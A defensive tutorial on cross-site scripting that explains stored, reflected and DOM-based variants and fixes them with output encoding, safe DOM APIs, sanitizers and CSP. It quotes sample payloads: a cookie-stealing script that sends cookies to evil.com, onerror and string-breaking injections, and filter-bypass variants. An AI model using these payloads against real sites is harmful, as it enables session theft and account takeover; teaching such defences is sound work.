XSS & Output Encoding

Cross-Site Scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious scripts into a web page viewed by other users. The victim's browser executes the script because it treats everything the site serves as coming from the site itself. The primary fix is output encoding: transforming special characters so the browser renders them as text, not code.

How XSS Works

XSS exploits the fact that browsers cannot distinguish between legitimate scripts and injected ones. If a web page includes user-controlled content without encoding it, an attacker can inject JavaScript that runs in the context of another user's session.

// A comment feature that displays user input directly
<div class="comment">
  USER_INPUT_HERE
</div>

// Normal input: "Great article!"
// Rendered: <div class="comment">Great article!</div>

// Malicious input: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
// Rendered: <div class="comment"><script>document.location='https://evil.com/steal?c='+document.cookie</script></div>
// The browser executes the script, sending the victim's cookies to the attacker

If the session cookie is not marked HttpOnly, the attacker now has it and can impersonate the victim.

Three Types of XSS

Stored XSS (Persistent)

The malicious script is saved to the server (in a database, file, or cache) and served to every user who views the affected page. This is usually the most dangerous type because it reaches every visitor without any further action by the attacker.

Attack flow:
1. Attacker submits a comment containing a script tag
2. Server stores the comment in the database
3. When any user loads the page, the server includes the stored comment
4. The victim's browser executes the script
5. Every user who views the page is compromised

Common targets:
- Comment sections, forum posts, user profiles
- Product reviews, support tickets
- Any feature that stores and displays user content

Reflected XSS (Non-Persistent)

The malicious script is included in a URL or form submission and reflected back in the server's response. The attacker must trick the victim into clicking a crafted link.

// Vulnerable search page
// URL: https://example.com/search?q=USER_INPUT
// Response: <p>Results for: USER_INPUT</p>

// Attacker crafts URL:
// https://example.com/search?q=<script>steal_cookies()</script>
// Sends link to victim via email or social media

// When victim clicks, the server reflects the script in the response
// The browser executes it in the context of example.com
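
The reflected flow above can be sketched as a pure function. This is a minimal illustration, not a real server: renderSearchPage and escapeHtml are hypothetical names, and the sketch assumes the handler receives the full request URL as a string. The point it shows is that the query value arrives percent-decoded and must be HTML-encoded at the moment it is written into the response.

```javascript
// Hypothetical helper: HTML-encode the characters that are special in
// element content and quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hypothetical handler: takes the request URL, returns the HTML fragment.
function renderSearchPage(requestUrl) {
  // searchParams.get() returns the percent-decoded value, or null if absent.
  const query = new URL(requestUrl).searchParams.get('q') ?? '';
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

const crafted =
  'https://example.com/search?q=' +
  encodeURIComponent('<script>steal_cookies()</script>');

console.log(renderSearchPage(crafted));
// <p>Results for: &lt;script&gt;steal_cookies()&lt;/script&gt;</p>
```

With the encoding in place, the crafted link still works as a search, but the payload is displayed as text instead of being executed.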

DOM-Based XSS

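The vulnerability exists entirely in client-side JavaScript: a script reads attacker-controlled data (such as the URL fragment) and writes it into the DOM through an unsafe API. When the payload travels in the fragment, the server never sees it, because browsers do not send the part of the URL after # to the server.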

// Vulnerable JavaScript code
const hash = window.location.hash.substring(1);
document.getElementById('output').innerHTML = hash;

// Attacker crafts URL:
// https://example.com/page#<img src=x onerror=steal_cookies()>

// The server returns the same page regardless
// The client-side JavaScript reads the hash and inserts it into the DOM
// The browser executes the onerror handler

DOM-based XSS is harder to detect because a payload carried in the URL fragment never appears in server logs. It exists only in the browser.
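
One possible fix for the vulnerable snippet above is to write the fragment as text rather than as HTML. The sketch below is an assumption-laden illustration: showHash is a hypothetical function, and it takes the location and element as parameters so it can be exercised outside a browser with stand-in objects.

```javascript
// Hypothetical fix: write the URL fragment as text, never as markup.
// `loc` is a Location-like object, `el` an Element-like object.
function showHash(loc, el) {
  const hash = loc.hash.substring(1);
  // textContent never invokes the HTML parser, so markup stays inert.
  el.textContent = hash;
}

// Stand-in objects (assumptions for illustration, not real DOM nodes)
const fakeLocation = { hash: '#<img src=x onerror=steal_cookies()>' };
const fakeElement = { textContent: '' };

showHash(fakeLocation, fakeElement);
console.log(fakeElement.textContent);
// <img src=x onerror=steal_cookies()>
```

In a page, the call would be showHash(window.location, document.getElementById('output')), and the payload would appear on screen as literal characters.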

The Fix: Context-Aware Output Encoding

The fix for XSS is encoding output based on the context where user data appears. Different contexts require different encoding rules.

HTML Context

When user data appears as HTML content, encode HTML special characters:

Character    Encoded
<            &lt;
>            &gt;
&            &amp;
"            &quot;
'            &#x27;

// Before encoding:
<div>USER_INPUT</div>
// If input is: <script>alert(1)</script>
// Rendered: <script>alert(1)</script>  -> EXECUTES

// After encoding:
<div>&lt;script&gt;alert(1)&lt;/script&gt;</div>
// Rendered as text: <script>alert(1)</script>  -> SAFE, displays as text
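
The table above translates directly into a small helper. This is a minimal sketch, assuming the value is placed in element content or a quoted attribute; escapeHtml and HTML_ENTITIES are hypothetical names, and a templating engine's built-in escaping is usually preferable to a hand-rolled function.

```javascript
// Hypothetical helper: maps each character from the table to its entity.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(value) {
  // A single pass over the string, so "&" in the output is never re-encoded.
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

const comment = '<script>alert(1)</script>';
const html = `<div class="comment">${escapeHtml(comment)}</div>`;
console.log(html);
// <div class="comment">&lt;script&gt;alert(1)&lt;/script&gt;</div>
```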

JavaScript Context

When user data appears inside a JavaScript string, HTML encoding is not enough. Use JavaScript-specific encoding:

// Dangerous: user data in a JavaScript string
<script>
  var name = "USER_INPUT";
</script>

// Attacker input: "; alert(1); //
// Result: var name = ""; alert(1); //";  -> EXECUTES

// Fix: JavaScript-encode the value (escape quotes, backslashes, newlines,
// and < and > so the value cannot close the surrounding script block)
// Or better: avoid putting user data in inline scripts entirely
// Use data attributes instead:
<div id="user" data-name="ENCODED_USER_INPUT"></div>
<script>
  var name = document.getElementById('user').dataset.name;
</script>
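
When a value really must be embedded in an inline script, one common approach is to serialize it as JSON and then escape the characters that could end the script block. The sketch below assumes the value is JSON-serializable; serializeForScript is a hypothetical name, not a library function.

```javascript
// Hypothetical helper: serialize a JSON-compatible value for embedding
// inside an inline <script> block.
function serializeForScript(value) {
  return JSON.stringify(value)     // handles quotes, backslashes, newlines
    .replace(/</g, '\\u003c')      // prevents "</script>" from closing the block
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028') // line separators, escaped for older engines
    .replace(/\u2029/g, '\\u2029');
}

const attackerInput = '"; alert(1); //';
console.log(`var name = ${serializeForScript(attackerInput)};`);
// var name = "\"; alert(1); //";

const closer = '</script><script>alert(1)</script>';
console.log(serializeForScript(closer));
// "\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e"
```

The escaped output is still a valid JavaScript string literal that evaluates to the original value, so the page logic sees the data unchanged.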

URL & CSS Contexts

When user data appears in a URL, percent-encode it when it is a path segment or query value, and validate the scheme when it is the whole URL (allow only http and https, never javascript:). When user data appears in CSS, avoid it entirely if possible, or validate against an allowlist of safe values. Each context has its own injection vectors and requires its own encoding.
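
Both URL rules can be sketched with the standard URL class and encodeURIComponent. The helper name safeHttpUrl is hypothetical, and the sketch assumes only absolute http and https links should be accepted; relative URLs would need a separate policy.

```javascript
// Hypothetical helper: return the normalized URL if it is absolute http(s),
// otherwise null.
function safeHttpUrl(input) {
  let url;
  try {
    url = new URL(input); // throws on relative or malformed input
  } catch {
    return null;
  }
  // The parser lowercases the scheme and strips surrounding whitespace,
  // so case tricks and leading spaces do not slip through.
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

console.log(safeHttpUrl('https://example.com/profile')); // https://example.com/profile
console.log(safeHttpUrl('javascript:alert(1)'));          // null
console.log(safeHttpUrl(' JaVaScRiPt:alert(1)'));         // null

// For user data placed inside a query string, percent-encode the value itself.
const q = 'a&b=<c>';
console.log('https://example.com/search?q=' + encodeURIComponent(q));
// https://example.com/search?q=a%26b%3D%3Cc%3E
```

A URL that passes this check still needs HTML attribute encoding when it is written into an href or src attribute.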

innerHTML Is Dangerous

The innerHTML property parses its content as HTML. Script tags inserted this way do not run, but event-handler attributes such as onerror and onload do, so attacker-controlled markup still executes code.

// Dangerous
element.innerHTML = userInput;
// If userInput contains <img src=x onerror=alert(1)>, it executes

// Safe alternatives
element.textContent = userInput;  // Treats input as text, not HTML
element.innerText = userInput;    // Also safe, treats as text

This applies to any DOM API that parses HTML:

// Dangerous DOM APIs
element.innerHTML = data;
element.outerHTML = data;
document.write(data);
document.writeln(data);
element.insertAdjacentHTML('beforeend', data);

// Safe DOM APIs
element.textContent = data;
element.setAttribute('value', data);  // Safe for plain-value attributes; not for href, src, style, or on* handlers
document.createTextNode(data);

Modern Frameworks Auto-Escape by Default

React, Svelte, Vue, and Angular encode output by default. This eliminates most XSS vulnerabilities — but not all.

// React — safe by default
function Comment({ text }) {
  return <div>{text}</div>;
  // React escapes the text automatically
  // <script>alert(1)</script> is rendered as text, not executed
}

// React — dangerous escape hatch
function Comment({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
  // The name is intentionally scary. This bypasses React's encoding.
  // Only use with sanitized content.
}

// Svelte — safe by default
<p>{userInput}</p>
<!-- Svelte escapes userInput automatically -->

// Svelte — dangerous escape hatch
{@html userInput}
<!-- This renders raw HTML. Only use with sanitized content. -->

The pattern: frameworks escape by default, and provide explicitly-named escape hatches for when you need raw HTML. Treat every use of the escape hatch as a potential XSS vector.

Content Security Policy (CSP)

CSP is a defense-in-depth mechanism. It does not fix XSS — encoding does. But CSP limits the damage if encoding fails.

CSP is an HTTP header that tells the browser which scripts, styles, and other resources are allowed to execute.

// Strict CSP — blocks inline scripts and only allows scripts from your domain
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self';

// With nonces: allow specific inline scripts
// (abc123 is a placeholder; generate a new random nonce for every response)
Content-Security-Policy: script-src 'nonce-abc123';

// In HTML:
<script nonce="abc123">
  // This script runs because its nonce matches the CSP header
  legitimateCode();
</script>

<script>
  // This script is blocked because it has no nonce
  attackerCode();
</script>

CSP also supports report-only mode (Content-Security-Policy-Report-Only) which logs violations without blocking them, useful for rolling out a policy gradually.
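
A nonce only helps if an attacker cannot predict it, so it has to be random and regenerated for every response. The following is a minimal Node.js sketch under that assumption; buildCsp is a hypothetical helper, and the policy string is just one plausible combination of the directives shown above.

```javascript
const { randomBytes } = require('node:crypto');

// Hypothetical helper: build a fresh nonce and the matching policy
// for a single response.
function buildCsp() {
  // 16 random bytes, base64-encoded; never reuse across responses
  const nonce = randomBytes(16).toString('base64');
  const header = `default-src 'self'; script-src 'nonce-${nonce}'; style-src 'self'`;
  return { nonce, header };
}

const { nonce, header } = buildCsp();
console.log('Content-Security-Policy: ' + header);
console.log(`<script nonce="${nonce}">legitimateCode();</script>`);
```

The same nonce value goes into the header and into each inline script tag the server itself generates, so an injected script tag, which cannot know the value, is blocked.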

Real-World XSS Attacks

2018 — British Airways
- Attackers injected a script into the BA website payment page
- The script captured credit card details as customers typed them
- 380,000 transactions were compromised over two weeks
- The UK regulator (ICO) initially proposed a fine of about $230 million
  (£183 million) under GDPR, later reduced to about $26 million (£20 million)
- The injected script was 22 lines of JavaScript that copied form data
  to a server controlled by the Magecart group

2019 — Fortnite (Epic Games)
- Researchers discovered an XSS vulnerability in an old,
  forgotten Epic Games subdomain
- Combined with an OAuth token theft, attackers could take over
  any Fortnite account without knowing the password
- 200 million player accounts were potentially at risk
- The vulnerability was in a page that had not been maintained for years

2005 — MySpace (Samy Worm)
- Samy Kamkar created a self-propagating XSS worm
- When a user viewed Samy's profile, the worm added Samy as a friend
  and copied itself to the viewer's profile
- Within 20 hours, over 1 million users were infected
- MySpace had to take the site offline temporarily to remove the worm

HTML Sanitization

Sometimes you need to allow some HTML (rich text editors, markdown rendering). In these cases, use a well-tested HTML sanitizer — never write your own.

// DOMPurify — the standard client-side sanitizer
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(dirtyHTML);

// DOMPurify removes dangerous elements and attributes:
// Input:  <p>Hello <script>alert(1)</script> <b>world</b></p>
// Output: <p>Hello  <b>world</b></p>

// Configure to allow only specific tags
// (a separate variable name, since clean is already declared above)
const cleanRestricted = DOMPurify.sanitize(dirtyHTML, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p'],
  ALLOWED_ATTR: ['href']
});

Never use regex to strip HTML tags. Attackers know more edge cases than your regex handles.
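
To see why, consider a deliberately naive filter. The function below is an anti-pattern written only for illustration (stripScriptTags is a hypothetical name): it removes script tags in one pass, and two simple inputs defeat it.

```javascript
// Naive filter (an anti-pattern, shown only to illustrate the bypass)
function stripScriptTags(input) {
  return input.replace(/<\/?script>/gi, '');
}

// Nesting: removing the inner tags reassembles the outer ones.
const nested = '<scr<script>ipt>alert(1)</scr</script>ipt>';
console.log(stripScriptTags(nested));
// <script>alert(1)</script>

// No script tag at all: the event handler passes through untouched.
const handler = '<img src=x onerror=alert(1)>';
console.log(stripScriptTags(handler));
// <img src=x onerror=alert(1)>
```

Patching the regex for these two cases just moves the problem to the next vector, which is why a parser-based sanitizer is the safer choice.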

Common Pitfalls

Encoding in the wrong context. HTML encoding does not protect JavaScript contexts. URL encoding does not protect HTML contexts. You must match the encoding to the context where the data appears.
Trusting client-side validation. Client-side validation improves UX but provides zero security. Attackers bypass it by sending requests directly. Always encode on the server.
Blocklist filtering. Stripping <script> tags is trivially bypassed: <scr<script>ipt>, <SCRIPT>, <img onerror=...>, event handlers, SVG elements, and dozens of other vectors. Use encoding, not blocklists.
Using dangerouslySetInnerHTML or {@html} without sanitization. These escape hatches exist for legitimate use cases, but every use must sanitize its input with a library like DOMPurify first.
Forgetting about DOM-based XSS. Server-side encoding does not help when the vulnerability is in client-side JavaScript. Audit client-side code for dangerous sinks like innerHTML, document.write, and eval.
Thinking CSP replaces encoding. CSP is defense in depth. It reduces the impact of XSS but does not prevent it. A strict CSP can block inline script execution, but encoding should be the primary defense.
Assuming HttpOnly cookies make XSS harmless. Even when XSS cannot read cookies marked HttpOnly, attackers can still perform actions as the user by sending requests from the victim's browser, redirect the user, deface the page, or capture keystrokes.

Key Takeaways

XSS occurs when user input is included in web pages without encoding, allowing attacker-controlled scripts to execute in victims' browsers.
There are three types: stored (most dangerous, persists in the database), reflected (requires clicking a link), and DOM-based (entirely client-side).
The fix is context-aware output encoding: HTML encoding for HTML contexts, JavaScript encoding for JS contexts, URL encoding for URLs.
Never use innerHTML with user data. Use textContent instead.
Modern frameworks (React, Svelte, Vue, Angular) auto-escape by default. Their escape hatches (such as dangerouslySetInnerHTML and {@html}) require sanitized input.
CSP is defense in depth that limits what scripts can execute, but encoding is the primary defense.
Real-world XSS attacks have put hundreds of millions of accounts at risk and have led to regulatory fines in the tens of millions of dollars.